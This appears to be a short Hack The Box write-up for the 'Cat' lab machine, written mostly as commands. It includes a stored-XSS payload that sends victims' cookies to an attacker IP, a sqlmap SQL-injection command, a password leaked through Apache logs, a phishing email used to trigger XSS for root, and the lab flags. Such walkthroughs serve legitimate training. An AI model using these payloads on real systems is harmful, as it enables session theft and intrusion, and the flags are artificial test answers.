// htb writeup Linux 2026-02-25
Cat
HackTheBox Medium Linux
Web / SQLi / XSS / PrivEsc
root obtained // PWNED

🐾 Cat — Hack The Box

Difficulty: Medium
IP: 10.129.234.87
OS: Linux
Category: Web / SQLi / XSS / PrivEsc
Status: ✅ Done


🧭 Overview


📡 Enumeration

nmap cat.htb
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
<img src=1 onerror=this.src="http://10.10.xx.xx/?ccc="+encodeURIComponent(document.cookie)>

🐱 SQL Injection

$sql_insert = "INSERT INTO accepted_cats (name) VALUES ('$cat_name')";
sqlmap -u "http://cat.htb/accept_cat.php" --cookie="PHPSESSID=..." --data="catId=1&catName=123" -p catName --dbms=SQLite --level=5

🧠 Credential Reuse & Log Leakage

cat /var/log/apache2/access.log | grep axel
GET /join.php?loginUsername=axel&loginPassword=aNdZwgC4tI9gnVXv_e3Q

🚪 Root Access (Port Forward + XSS)

ssh rosa@cat.htb -L 3000:127.0.0.1:3000
swaks --to "jobert@localhost" --from "axel@localhost" --header "Click"   --body "http://localhost:3000/axel/xss" --server localhost

🏁 Flags

cat user.txt
56726c7c53163f6b2cddd30da152a32d

cat root.txt
b6503818144bada3cd5c62210f1427c7

🔍 Lessons Learned